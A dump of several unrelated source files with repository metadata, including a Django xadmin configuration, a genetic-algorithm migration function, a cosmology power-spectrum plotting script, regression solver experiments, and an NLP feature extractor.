556b47ee9741e6478e72dc7ba357d7f7214ecc55 | f6de805e4e0e169cd82562aca20bfef3b38c8c31 | /apps/users/adminx.py | ed82ab401d80dc903fe1250af5de075c40fee0fa | [] | no_license | Huangkai1008/stuonline | 742ac9b27ea1cda8e2c35bf0425cb076ff0345dc | f874eeeb91433d7d789783347e4ffbb01198da58 | refs/heads/master | 2022-10-26T03:36:40.910069 | 2018-01-08T05:41:15 | 2018-01-08T05:41:29 | 114,594,601 | 0 | 1 | null | 2022-10-18T01:01:58 | 2017-12-18T04:05:32 | Python | UTF-8 | Python | false | false | 1,005 | py | # coding:utf8
import xadmin
from xadmin import views
from .models import EmailVerifyRecord, Banner
class BaseSetting(object):
    """Global xadmin settings: enable selectable (bootswatch) UI themes."""
    enable_themes = True
    use_bootswatch = True
class GlobalSetting(object):
    """Site-wide xadmin chrome: page title, footer text, and menu style."""
    site_title = "Mooc后台管理系统"
    site_footer = "mooc在线"
    menu_style = "accordion"
class EmailVerifyRecordAdmin(object):
    """Admin list/search/filter configuration for email verification records."""
    list_display = ['code', 'email', 'send_type', 'send_time']
    search_fields = ['code', 'email', 'send_type']
    list_filter = ['code', 'email', 'send_type', 'send_time']
class BannerAdmin(object):
    """Admin list/search/filter configuration for carousel banners."""
    list_display = ['title', 'image', 'url', 'index', 'add_time']
    search_fields = ['title', 'image', 'url', 'index']
    list_filter = ['title', 'image', 'url', 'index', 'add_time']
# Register the models with their admin configs, and attach the theme /
# global-chrome settings to xadmin's base views.
xadmin.site.register(EmailVerifyRecord, EmailVerifyRecordAdmin)
xadmin.site.register(Banner, BannerAdmin)
xadmin.site.register(views.BaseAdminView, BaseSetting)
xadmin.site.register(views.CommAdminView, GlobalSetting)
| [
"18778335525@163.com"
] | 18778335525@163.com |
e40c6d6f5675fdbe0d83e5a15f777af2e4f5f6e6 | 13a32b92b1ba8ffb07e810dcc8ccdf1b8b1671ab | /home--tommy--mypy/mypy/lib/python2.7/site-packages/deap/tools/migration.py | c5c5a598b606788966662c951ee1599f7c6f8ab9 | [
"Unlicense"
] | permissive | tommybutler/mlearnpy2 | 8ec52bcd03208c9771d8d02ede8eaa91a95bda30 | 9e5d377d0242ac5eb1e82a357e6701095a8ca1ff | refs/heads/master | 2022-10-24T23:30:18.705329 | 2022-10-17T15:41:37 | 2022-10-17T15:41:37 | 118,529,175 | 0 | 2 | Unlicense | 2022-10-15T23:32:18 | 2018-01-22T23:27:10 | Python | UTF-8 | Python | false | false | 2,764 | py | from __future__ import division
def migRing(populations, k, selection, replacement=None, migarray=None):
    """Perform a ring migration between the *populations*. The migration first
    select *k* emigrants from each population using the specified *selection*
    operator and then replace *k* individuals from the associated population
    in the *migarray* by the emigrants. If no *replacement* operator is
    specified, the immigrants will replace the emigrants of the population,
    otherwise, the immigrants will replace the individuals selected by the
    *replacement* operator. The migration array, if provided, shall contain
    each population's index once and only once. If no migration array is
    provided, it defaults to a serial ring migration (1 -- 2 -- ... -- n --
    1). Selection and replacement function are called using the signature
    ``selection(populations[i], k)`` and ``replacement(populations[i], k)``.
    It is important to note that the replacement strategy must select *k*
    **different** individuals. For example, using a traditional tournament for
    replacement strategy will thus give undesirable effects, two individuals
    will most likely try to enter the same slot.

    :param populations: A list of (sub-)populations on which to operate
                        migration.
    :param k: The number of individuals to migrate.
    :param selection: The function to use for selection.
    :param replacement: The function to use to select which individuals will
                        be replaced. If :obj:`None` (default) the individuals
                        that leave the population are directly replaced.
    :param migarray: A list of indices indicating where the individuals from
                     a particular position in the list goes. This defaults
                     to a ring migration.
    """
    nbr_demes = len(populations)
    if migarray is None:
        # Default serial ring: deme i sends to deme i+1, the last wraps to 0.
        # list(...) keeps this valid on both Python 2 and Python 3, where
        # range() returns a lazy object that does not support '+'
        # (the previous xrange/range-concatenation was Python-2-only).
        migarray = list(range(1, nbr_demes)) + [0]

    immigrants = [[] for _ in range(nbr_demes)]
    emigrants = [[] for _ in range(nbr_demes)]

    for from_deme in range(nbr_demes):
        emigrants[from_deme].extend(selection(populations[from_deme], k))
        if replacement is None:
            # If no replacement strategy is selected, replace those who migrate
            immigrants[from_deme] = emigrants[from_deme]
        else:
            # Else select those who will be replaced
            immigrants[from_deme].extend(replacement(populations[from_deme], k))

    for from_deme, to_deme in enumerate(migarray):
        for i, immigrant in enumerate(immigrants[to_deme]):
            # Locate the slot of the individual being replaced and overwrite
            # it with the i-th emigrant coming from *from_deme*.
            indx = populations[to_deme].index(immigrant)
            populations[to_deme][indx] = emigrants[from_deme][i]


__all__ = ['migRing']
"tbutler.github@internetalias.net"
] | tbutler.github@internetalias.net |
8a9780c347a8c98f84d292c41a1fb0567cb89ea7 | 607241e619ca499121106b218a5e00ac5244bda3 | /analysis/plot_power_spectrum_ch_hydro_MPI_enzo.py | 047f5abbf4b31835cfaf40243969c97d0465bc6b | [] | no_license | bvillasen/cosmo_sims | 37caea950c7be0626a5170333bfe734071c58124 | 8b20dc05842a22ea50ceb3d646037d2e66fc8c9b | refs/heads/master | 2020-04-22T23:22:28.670894 | 2020-01-02T23:32:39 | 2020-01-02T23:32:39 | 114,167,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,135 | py | import sys
import numpy as np
import matplotlib.pyplot as plt
import h5py as h5
from power_spectrum import get_power_spectrum
dev_dir = '/home/bruno/Desktop/Dropbox/Developer/'
cosmo_dir = dev_dir + 'cosmo_sims/'
toolsDirectory = cosmo_dir + "tools/"
sys.path.extend([toolsDirectory ] )
from load_data_cholla import load_snapshot_data
from load_data_enzo import load_snapshot_enzo
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
# dataDir = '/home/bruno/Desktop/data/'
dataDir = '/raid/bruno/data/'
outputsDir = '/home/bruno/cholla/scale_output_files/'
# Run parameters identifying the simulation data set to compare.
eta = 0.030
beta = 0.25
nPoints = 256
Lbox = 50.0 #Mpc/h
data_name = data_name = 'SIMPLE_PPMP_eta0.035_beta0.00_grav4_clean'
# dataSet = 'PLMP'
enzoDir = dataDir + 'cosmo_sims/enzo/{0}_hydro_50Mpc_HLLC_grav4/h5_files/'.format(nPoints )
# chollaDir = dataDir + 'cosmo_sims/cholla_pm/{1}_hydro_50Mpc/data_enzo_{2}_eta{0:.3f}/'.format( eta, nPoints, reconst )
chollaDir = dataDir + 'cosmo_sims/cholla_pm/{1}_hydro_50Mpc/data_{0}/'.format( data_name, nPoints, )
outDir = dev_dir + 'figures/power_hydro/'
# fileName = outDir + 'ps_{0}_hydro_enzo_{2}_eta{1:.3f}.png'.format( nPoints, eta, reconst )
# set simulation volume dimentions
nz, ny, nx = nPoints, nPoints, nPoints
nCells = nx*ny*nz
h = 0.6766
Lx = Lbox
Ly = Lbox
Lz = Lbox
dx, dy, dz = Lx/(nx), Ly/(ny), Lz/(nz )
n_kSamples = 12
# Redshifts at which to compare the codes (reversed so z decreases in plots).
redshift_list = [ 100, 70, 40, 10, 7, 4, 1, 0.6, 0.3, 0 ]
redshift_list.reverse()
# Map each requested redshift to the closest available Enzo output snapshot.
outputs_enzo = np.loadtxt( outputsDir + 'outputs_hydro_enzo_256_50Mpc_HLLC_grav4.txt')
z_enzo = 1./(outputs_enzo) - 1
snapshots_enzo = []
for z in redshift_list:
  z_diff_enzo = np.abs( z_enzo - z )
  index_enzo = np.where( z_diff_enzo == z_diff_enzo.min())[0][0]
  snapshots_enzo.append( index_enzo )
snapshots = snapshots_enzo
# Old hand-picked snapshot lists, kept for reference:
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 22, 24, 27]
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 20, 25, 30]
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 20, 24, 38]
# # snapshots = [ 0, 2, 4, 7, 10, 13, 16, 19]
# # snapshots = [ 0, 2, 4]
# n_snapshots = len( snapshots )
n_snapshots = len(snapshots)
# One MPI rank per snapshot; surplus ranks exit immediately.
if rank >= n_snapshots: exit()
nSnap = snapshots[rank]
# Rows of ps_all: [Cholla DM, Cholla gas, Enzo DM, Enzo gas] power spectra.
n_power_data = 4
ps_all = np.ones( [n_power_data, n_kSamples] )
# ps_all *= rank
print " Cholla: ", nSnap
snapKey = str( nSnap )
# if i not in [9]: continue
data_cholla = load_snapshot_data( snapKey, chollaDir, cool=False, single_file=False )
current_z_ch = data_cholla['current_z']
dens_dm_cholla = data_cholla['dm']['density'][...]
dens_gas_cholla = data_cholla['gas']['density'][...]
ps_dm_cholla, k_vals, count_dm_cholla = get_power_spectrum( dens_dm_cholla, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_gas_cholla, k_vals, count_gas_cholla = get_power_spectrum( dens_gas_cholla, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_all[0] = ps_dm_cholla
ps_all[1] = ps_gas_cholla
print ' Enzo: ', nSnap
data_enzo = load_snapshot_enzo( nSnap, enzoDir, dm=True, cool=False)
current_a_enzo = data_enzo['current_a']
current_z_enzo = data_enzo['current_z']
dens_dm_enzo = data_enzo['dm']['density'][...]
dens_gas_enzo = data_enzo['gas']['density'][...]
ps_dm_enzo, k_vals, count_dm_enzo = get_power_spectrum( dens_dm_enzo, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_gas_enzo, k_vals, count_gas_enzo = get_power_spectrum( dens_gas_enzo, Lbox, nx, ny, nz, dx, dy, dz, n_kSamples=n_kSamples)
ps_all[2] = ps_dm_enzo
ps_all[3] = ps_gas_enzo
# Gather every rank's spectra on rank 0.
send_buf = ps_all
recv_buf = None
if rank == 0:
  recv_buf = np.empty ([ n_snapshots, n_power_data, n_kSamples], dtype=np.float64)
comm.Gather(send_buf, recv_buf, root=0)
data_all = recv_buf
# Gather each rank's Cholla redshift on rank 0 (used for plot labels).
send_buf = np.array([current_z_ch])
recv_buf = None
if rank == 0:
  recv_buf = np.empty ([ n_snapshots ], dtype=np.float64)
comm.Gather(send_buf, recv_buf, root=0)
current_z_all = recv_buf
# Only rank 0 produces the figure.
if rank != 0: exit()
# print data_all
# print current_z_all
fig = plt.figure(0)
fig.set_size_inches(20,10)
fig.clf()
gs = plt.GridSpec(5, 2)
gs.update(hspace=0.05, wspace=0.08, )
ax1 = plt.subplot(gs[0:4, 0])  # DM power spectra
ax2 = plt.subplot(gs[4:5, 0])  # DM fractional difference
ax3 = plt.subplot(gs[0:4, 1])  # gas power spectra
ax4 = plt.subplot(gs[4:5, 1])  # gas fractional difference
# colors = ['b', 'y', 'g', 'c', 'm', 'b', 'y', 'g', 'c', 'm', ]
colors = ['C0', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9']
for i in range(n_snapshots):
  ps_dm_cholla = data_all[i,0]
  ps_gas_cholla = data_all[i,1]
  ps_dm_enzo = data_all[i,2]
  ps_gas_enzo = data_all[i,3]
  label = 'z = {0:.1f}'.format(current_z_all[i])
  c = colors[i]
  if i == 0:
    ax1.plot( k_vals, ps_dm_enzo, '--', c=c, linewidth=1, label='Enzo' )
    ax3.plot( k_vals, ps_gas_enzo, '--', c=c, linewidth=1, label='Enzo' )
  else:
    ax1.plot( k_vals, ps_dm_enzo, '--', c=c, linewidth=1 )
    ax3.plot( k_vals, ps_gas_enzo, '--', c=c, linewidth=1 )
  #
  ax1.plot( k_vals, ps_dm_cholla, c=c, linewidth=2, label=label )
  ax3.plot( k_vals, ps_gas_cholla, c=c, linewidth=2, label=label )
  # Fractional difference of Cholla relative to Enzo.
  error_dm = (ps_dm_cholla - ps_dm_enzo) / ps_dm_enzo
  error_gas = (ps_gas_cholla - ps_gas_enzo) / ps_gas_enzo
  ax2.plot( k_vals, error_dm , c=c, alpha=0.9)
  ax4.plot( k_vals, error_gas , c=c, alpha=0.9)
ax2.axhline( y=0., color='r', linestyle='--', )
ax2.set_ylim( -1, 1)
ax4.axhline( y=0., color='r', linestyle='--', )
ax4.set_ylim( -1, 1)
ax1.set_ylabel( r'$P(k) $', fontsize=17)
ax2.set_ylabel( 'Difference', fontsize=15)
ax1.legend( loc=3)
ax2.set_xlabel( r'$k \, \, [h Mpc^{-1}]$', fontsize=17)
ax3.legend( loc=3)
# NOTE(review): this repeats the ax2 x-label; ax3 never gets one -- confirm intent.
ax2.set_xlabel( r'$k \, \, [h Mpc^{-1}]$', fontsize=17)
ax4.set_xlabel( r'$k \, \, [h Mpc^{-1}]$', fontsize=17)
ax1.set_xscale('log')
ax1.set_yscale('log')
ax3.set_xscale('log')
ax3.set_yscale('log')
ax2.set_xscale('log')
ax4.set_xscale('log')
ax1.set_title('DM Power Spectrum', fontsize=18)
ax3.set_title('Gas Power Spectrum ', fontsize=18)
# NOTE(review): data_name is reassigned here, so the figure title/filename
# use a different name than the directory the data was loaded from.
data_name = data_name = 'SIMPLE_PPMP_eta0.005_beta0.00_grav4'
fig.suptitle(r' {0} '.format(data_name), fontsize=20, y=0.95)
fileName = outDir + 'ps_{0}_hydro_enzo_{1}.png'.format( nPoints, data_name )
# ax1.xlim()
fig.savefig( fileName, pad_inches=0.1, bbox_inches='tight', dpi=80)
print 'Saved Image: ', fileName
| [
"bvillasen@gmail.com"
] | bvillasen@gmail.com |
ae3fc09f862ea7e2d30971709cad0a4ea02cc83f | e84a9b9bf1398f0e78a63ea3c5d50a5263165301 | /ridge.py | 07f327e9bd03ad145265355c94531c53c7a508ba | [] | no_license | theovincent/SAG_vs_SDCA | 6289f8ae90c8db5bc734cc76b362c7d329bd8d06 | 827614d3ef6bbd2355a53ff745879a887e23d5d8 | refs/heads/master | 2022-06-26T10:15:19.746976 | 2020-05-10T12:43:34 | 2020-05-10T12:43:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,355 | py | from pathlib import Path
import numpy as np
import matplotlib.pyplot as plt
# For the data
from src.utils.preprocess import get_houses_data
# For sag method
from src.sag.train_sag import sag_train
from src.sag.test_sag import sag_test
import src.sag.loss.squared_loss as square_sag
from src.sag.accuracy.regression_acc import regression_acc as acc_sag
from src.sag.visualisation.regression_visu import regression_visu as visu_sag
# For sdca method
from src.sdca.train_sdca import sdca_train
from src.sdca.test_sdca import sdca_test
from src.sdca.kernel.polynomial import polynomial_kernel
from src.sdca.kernel.gaussian import gaussian_kernel
from src.sdca.loss.square_loss import square_loss as square_sdca
from src.sdca.steps.square_step import square_step as step_sdca
from src.sdca.accuracy.regression_acc import regression_acc as acc_sdca
from src.sdca.visualisation.sdca_visu import sdca_visu
# Which of the two solvers to run.
YOU_WANT_SAG = False
YOU_WANT_SDCA = True
# -- Set the options --
ADD_BIAS = True
POLY_KERNEL = False
# --- Get the data ---
CSV_PATH = Path("data/data.csv")
(ALL_TRAINS, ALL_VALIDS, ALL_TESTS, PRICES_TRAIN, PRICES_VALID, PRICES_TEST, LIST_PREPROCESS) = get_houses_data(CSV_PATH)
# --- SAG ---
# Set the functions, the options and the parameters
FUNCTIONS_SAG = [square_sag, acc_sag, visu_sag]
OPTIONS = [ADD_BIAS, False, False]  # [ADD_BIAS, VISUALISATION, SHOW_PLOTS]
PARAM_SAG = np.array([[0.00007, 0.0003], [0.07, 0.3]])  # [LAMBDA, ETA]
if YOU_WANT_SAG:
    # -- Training: grid-search over each preprocessing variant --
    print("Train the sag...")
    NB_TRAININGS = len(ALL_TRAINS)
    ACCURACIES = np.zeros(NB_TRAININGS)
    ACCURACY_MAX = 0
    LAMBDA_OPT = 0
    ETA_OPT = 0
    IDX_TRY_OPT = None
    for idx_try in range(NB_TRAININGS):
        print(LIST_PREPROCESS[idx_try])
        # Training with the parameters
        RESULTS_SAG = sag_train(ALL_TRAINS[idx_try], PRICES_TRAIN, ALL_VALIDS[idx_try], PRICES_VALID, FUNCTIONS_SAG,
                                OPTIONS, PARAM_SAG)
        (ACCURACY_VALID, LAMBDA, ETA) = RESULTS_SAG
        # Keep the preprocessing/hyper-parameters with the best validation accuracy.
        ACCURACIES[idx_try] = ACCURACY_VALID
        print("Validation accuracy", ACCURACY_VALID)
        if ACCURACY_MAX < ACCURACY_VALID:
            ACCURACY_MAX = ACCURACY_VALID
            LAMBDA_OPT = LAMBDA
            ETA_OPT = ETA
            IDX_TRY_OPT = idx_try
    # -- Testing with the best parameters --
    print("Test the sag...")
    PARAMETERS = [ADD_BIAS, LAMBDA_OPT, ETA_OPT]
    ACCURACY_TEST = sag_test(ALL_TRAINS[IDX_TRY_OPT], PRICES_TRAIN, ALL_TESTS[IDX_TRY_OPT], PRICES_TEST, square_sag,
                             acc_sag, PARAMETERS)
    print("The accuracy for the test set is :", ACCURACY_TEST)
    print("It was made with the preprocessing :", LIST_PREPROCESS[IDX_TRY_OPT])
    print("The optimal value of lambda is :", LAMBDA_OPT)
    print("The optimal value of eta is :", ETA_OPT)
    # Plot the per-preprocessing validation accuracies.
    plt.figure()
    plt.bar(np.arange(0, NB_TRAININGS, 1), ACCURACIES)
    plt.xlabel("Different preprocessing")
    plt.ylabel("Validation accuracy")
    plt.show()
# --- SDCA ---
# Set the kernel parameters and the functions
if POLY_KERNEL:
    KERNEL = polynomial_kernel
else:
    KERNEL = gaussian_kernel
FUNCTIONS_SDCA = [square_sdca, step_sdca, POLY_KERNEL, KERNEL, acc_sdca]
# Set the range of the parameters for the optimisation : box, degree or gamma
if POLY_KERNEL:
    PARAM_SDCA = np.array([[0.1, 3], [1, 5]])
else:
    PARAM_SDCA = np.array([[5, 10], [0.005, 0.009]])  # [BOX, GAMMA]
VISU_SDCA = [False, False, sdca_visu, None, None]  # [SHOW_PLOTS, SHOW_VISU, VISUALISATION, POINTS, VALUES]
if YOU_WANT_SDCA:
    # -- Training: same grid-search structure as the SAG branch above --
    print("Train the sdca...")
    NB_TRAININGS = len(ALL_TRAINS)
    ACCURACIES = np.zeros(NB_TRAININGS)
    ACCURACY_MAX = 0
    BOX_OPT = 0
    PARAM_OPT = 0
    IDX_TRY_OPT = None
    for idx_try in range(NB_TRAININGS):
        print(LIST_PREPROCESS[idx_try])
        # Training with the parameters
        RESULTS_SDCA = sdca_train(ALL_TRAINS[idx_try], PRICES_TRAIN, ALL_VALIDS[idx_try], PRICES_VALID, FUNCTIONS_SDCA,
                                  VISU_SDCA, PARAM_SDCA)
        (ACCURACY_VALID, BOX, KERNEL_PARAM) = RESULTS_SDCA
        # Keep the preprocessing/hyper-parameters with the best validation accuracy.
        ACCURACIES[idx_try] = ACCURACY_VALID
        print("Validation accuracy", ACCURACY_VALID)
        if ACCURACY_MAX < ACCURACY_VALID:
            ACCURACY_MAX = ACCURACY_VALID
            BOX_OPT = BOX
            PARAM_OPT = KERNEL_PARAM
            IDX_TRY_OPT = idx_try
    # -- Testing with the best parameters --
    print("Test the sdca...")
    PARAMETERS = [BOX_OPT, PARAM_OPT]
    ACCURACY_TEST = sdca_test(ALL_TRAINS[IDX_TRY_OPT], PRICES_TRAIN, ALL_TESTS[IDX_TRY_OPT], PRICES_TEST,
                              FUNCTIONS_SDCA, PARAMETERS)
    print("The accuracy for the test set is :", ACCURACY_TEST)
    print("It was made with the preprocessing :", LIST_PREPROCESS[IDX_TRY_OPT])
    print("The optimal value of the box is :", BOX_OPT)
    if POLY_KERNEL:
        print("The optimal degree of the polynomial kernel is :", PARAM_OPT)
    else:
        print("The optimal gamma of the gaussian kernel is :", PARAM_OPT)
    # Plot the per-preprocessing validation accuracies.
    plt.figure()
    plt.bar(np.arange(0, NB_TRAININGS, 1), ACCURACIES)
    plt.xlabel("Different preprocessing")
    plt.ylabel("Validation accuracy")
    plt.show()
| [
"theo.vincent@eleves.enpc.fr"
] | theo.vincent@eleves.enpc.fr |
349c0e8015ac58454cfde9a9351ad0e72ba789e7 | d02508f5ebbbdb4ba939ba830a8e8d9abc69774a | /Array/combinationSum.py | 3162ed77fd98c7e3440de32e89a479d00c864026 | [] | no_license | sameersaini/hackerank | e30c6270aaa0e288fa8b25392819509849cdabad | 3e66f89e02ade703715237722eda2fa2b135bb79 | refs/heads/master | 2021-06-12T09:24:15.266218 | 2019-10-18T02:22:00 | 2019-10-18T02:22:00 | 31,360,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 710 | py | def getCombinations(result, combination, candidates, target, startIndex):
if target == 0:
print(sum(combination))
result.append(combination[::])
return
for i in range(startIndex, len(candidates)):
if candidates[i] > target:
break
combination.append(candidates[i])
getCombinations(result, combination, candidates, target - candidates[i], i)
combination.pop()
class Solution:
    """Entry point for the combination-sum problem (LeetCode 39 style)."""

    def combinationSum(self, candidates, target):
        """Return all combinations of *candidates* (with repetition) whose
        elements sum to *target*. Sorts *candidates* in place."""
        if not candidates:
            return []
        # In-place sort enables the early-exit pruning inside the helper.
        candidates.sort()
        found = []
        getCombinations(found, [], candidates, target, 0)
        return found
| [
"sameersaini40@gmail.com"
] | sameersaini40@gmail.com |
e593a1aed501a0ba2ff2741d38bd5ecdde517abc | aa3cc5cddf07721962cdd92611daa0198ecc32ea | /nerds/features/rel2bow.py | c6ff2e0bab60aa292a61dbfca21f0c8c69e8a250 | [] | no_license | druv022/Disease-Normalization-with-Graph-Embeddings | 486a7c59d94ff502145796c1921611b937a4006a | c816ba37815d06bea394a99614e07baa3ebed5f2 | refs/heads/master | 2023-02-26T12:55:18.927522 | 2023-02-14T02:36:15 | 2023-02-14T02:36:15 | 242,658,320 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,181 | py | from pathlib import Path
from scipy.sparse import csc_matrix
from sklearn.externals import joblib
from sklearn.feature_extraction.text import CountVectorizer
from nerds.features.base import RelationFeatureExtractor, UNKNOWN_WORD, UNKNOWN_LABEL, UNKNOWN_POS_TAG, \
UNKNOWN_DEPENDENCY, BOWFeatureExtractor
from nerds.util.file import mkdir
from nerds.util.logging import get_logger
log = get_logger()
KEY = "rel2bow"
class BOWRelationFeatureExtractor(BOWFeatureExtractor, RelationFeatureExtractor):
def __init__(self):
super().__init__()
self.key = KEY
self.word_vectorizer = None
self.label_vectorizer = None
self.pos_vectorizer = None
self.dep_vectorizer = None
def transform(self, X, y=None, relation_labels=None):
log.info("Generating features for {} documents...".format(len(X)))
self.docs_examples = list(self.annotated_documents_to_examples(X, relation_labels=relation_labels))
ent_words = []
ent_labels = []
ent_pos_tags = []
ent_deps = []
rel_labels = []
for doc, examples in self.docs_examples:
for ex in examples:
ent_words += [ex.context["source.text"], ex.context["target.text"]]
ent_labels += [ex.context["source.label"], ex.context["target.label"]]
ent_pos_tags += [ex.context["source.pos"], ex.context["target.pos"]]
ent_deps += [ex.context["dependency"]]
rel_labels += [ex.label]
# add unknown values
ent_words += [UNKNOWN_WORD, UNKNOWN_WORD]
ent_labels += [UNKNOWN_LABEL, UNKNOWN_LABEL]
ent_pos_tags += [UNKNOWN_POS_TAG, UNKNOWN_POS_TAG]
ent_deps += [UNKNOWN_DEPENDENCY]
if not self.word_vectorizer:
# first time run
self.word_vectorizer = CountVectorizer(binary=True)
self.label_vectorizer = CountVectorizer(binary=True)
self.pos_vectorizer = CountVectorizer(binary=True)
self.dep_vectorizer = CountVectorizer(binary=True)
else:
# use vocabularies
self.word_vectorizer = CountVectorizer(binary=True, vocabulary=self.word_vectorizer.vocabulary_)
self.label_vectorizer = CountVectorizer(binary=True, vocabulary=self.label_vectorizer.vocabulary_)
self.pos_vectorizer = CountVectorizer(binary=True, vocabulary=self.pos_vectorizer.vocabulary_)
self.dep_vectorizer = CountVectorizer(binary=True, vocabulary=self.dep_vectorizer.vocabulary_)
ent_words = self._process_unknown_values(
ent_words, self.word_vectorizer.vocabulary, UNKNOWN_WORD)
ent_labels = self._process_unknown_values(
ent_labels, self.label_vectorizer.vocabulary, UNKNOWN_LABEL)
ent_pos_tags = self._process_unknown_values(
ent_pos_tags, self.pos_vectorizer.vocabulary, UNKNOWN_POS_TAG)
ent_deps = self._process_unknown_values(
ent_deps, self.dep_vectorizer.vocabulary, UNKNOWN_DEPENDENCY)
# vectorize
log.info("Vectorizing {} textual entries (words)...".format(len(ent_words)))
word_vectors = self.word_vectorizer.fit_transform(ent_words)
log.info("Vectorizing {} textual entries (labels)...".format(len(ent_labels)))
label_vectors = self.label_vectorizer.fit_transform(ent_labels)
log.info("Vectorizing {} textual entries (POS tags)...".format(len(ent_pos_tags)))
pos_vectors = self.pos_vectorizer.fit_transform(ent_pos_tags)
log.info("Vectorizing {} textual entries (dependency types)...".format(len(ent_deps)))
dep_vectors = self.dep_vectorizer.fit_transform(ent_deps)
# get shapes
n_wor, m_wor = word_vectors.get_shape()
n_lab, m_lab = label_vectors.get_shape()
n_pos, m_pos = pos_vectors.get_shape()
n_dep, m_dep = dep_vectors.get_shape()
# create indices
rows, cols, vals = [], [], []
# ignore the last auxiliary value
for row in range(n_dep - 1):
for col in word_vectors.getrow(2 * row).nonzero()[1]:
rows += [row]
cols += [col]
vals += [1]
for col in word_vectors.getrow(2 * row + 1).nonzero()[1]:
rows += [row]
cols += [col + m_wor]
vals += [1]
for col in label_vectors.getrow(2 * row).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor]
vals += [1]
for col in label_vectors.getrow(2 * row + 1).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + m_lab]
vals += [1]
for col in pos_vectors.getrow(2 * row).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + 2 * m_lab]
vals += [1]
for col in pos_vectors.getrow(2 * row + 1).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + 2 * m_lab + m_pos]
vals += [1]
for col in dep_vectors.getrow(row).nonzero()[1]:
rows += [row]
cols += [col + 2 * m_wor + 2 * m_lab + 2 * m_pos]
vals += [1]
# create a sparse matrix of features
log.info("Creating a feature matrix...")
feature_matrix = csc_matrix((vals, (rows, cols)), shape=(n_dep - 1, 2 * m_wor + 2 * m_lab + 2 * m_pos + m_dep))
return feature_matrix, rel_labels
def _process_unknown_values(self, entries, vocabulary, unknown_label):
entries_ref = []
for entry in entries:
known_tokens = []
for token in entry.split():
if token.lower() in vocabulary:
known_tokens += [token]
else:
known_tokens += [unknown_label]
entries_ref += [" ".join(known_tokens)]
return entries_ref
def save(self, file_path):
save_path = Path(file_path)
mkdir(save_path)
words_path = save_path.joinpath("words.dict")
labels_path = save_path.joinpath("labels.dict")
pos_path = save_path.joinpath("pos.dict")
dep_path = save_path.joinpath("dep.dict")
# save dictionaries
# we don't save examples for now
joblib.dump(self.word_vectorizer, words_path)
joblib.dump(self.label_vectorizer, labels_path)
joblib.dump(self.pos_vectorizer, pos_path)
joblib.dump(self.dep_vectorizer, dep_path)
def load(self, file_path):
load_path = Path(file_path)
words_path = load_path.joinpath("words.dict")
labels_path = load_path.joinpath("labels.dict")
pos_path = load_path.joinpath("pos.dict")
dep_path = load_path.joinpath("dep.dict")
# load dictionaries
# we don't load examples for now
self.word_vectorizer = joblib.load(words_path)
self.label_vectorizer = joblib.load(labels_path)
self.pos_vectorizer = joblib.load(pos_path)
self.dep_vectorizer = joblib.load(dep_path)
return self
| [
"c.thorne.1@elsevier.com"
] | c.thorne.1@elsevier.com |
402ed76f4050dfce87cdf347cee70aa1d417b2b9 | bc233c24523f05708dd1e091dca817f9095e6bb5 | /bitmovin_api_sdk/models/dolby_digital_plus_loudness_control_mode.py | efc53743e4d22e242284b556533a00f56e0a0846 | [
"MIT"
] | permissive | bitmovin/bitmovin-api-sdk-python | e3d6cf8eb8bdad62cb83ec77c0fc4950b06b9cdd | b0860c0b1be7747cf22ad060985504da625255eb | refs/heads/main | 2023-09-01T15:41:03.628720 | 2023-08-30T10:52:13 | 2023-08-30T10:52:13 | 175,209,828 | 13 | 14 | MIT | 2021-04-29T12:30:31 | 2019-03-12T12:47:18 | Python | UTF-8 | Python | false | false | 252 | py | # coding: utf-8
from enum import Enum
from six import string_types, iteritems
from bitmovin_api_sdk.common.poscheck import poscheck_model
class DolbyDigitalPlusLoudnessControlMode(Enum):
    """Loudness-control mode values ('PASSTHROUGH', 'CORRECTION') for
    Dolby Digital Plus encoding, serialized as their string names."""
    PASSTHROUGH = "PASSTHROUGH"
    CORRECTION = "CORRECTION"
| [
"openapi@bitmovin.com"
] | openapi@bitmovin.com |
7196ceabaee7d344102504ba28399e85aea0a3c2 | 60e6ea6af12bb37450dc4f254f953d81623232ce | /databases/venv/Scripts/pip3.8-script.py | 1b7b98beb5faf95df7a500294d4b8556ee0eb4ab | [] | no_license | vedant3598/PyCharm-Projects | 72a48d3e8468949c59675330c12aad1c7a03de41 | 7f49533b9c66de33c6a44e4864b1a639e6bfb0be | refs/heads/master | 2020-12-14T15:37:53.838758 | 2020-01-18T20:11:50 | 2020-01-18T20:11:50 | 233,339,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 403 | py | #!C:\Users\vedan\databases\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
# Auto-generated setuptools console-script wrapper; do not edit by hand.
if __name__ == '__main__':
    # Strip the '-script.py'/'.exe' suffix so pip sees a clean program name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
    )
| [
"vedant18@hotmail.com"
] | vedant18@hotmail.com |
b4e33b3180ce6ed1a3986904ec6e74ca3c6384fd | 10d98fecb882d4c84595364f715f4e8b8309a66f | /experience_replay/train.py | 74c4899eac50fc4f53a34183dee9333d07cdb04f | [
"CC-BY-4.0",
"Apache-2.0"
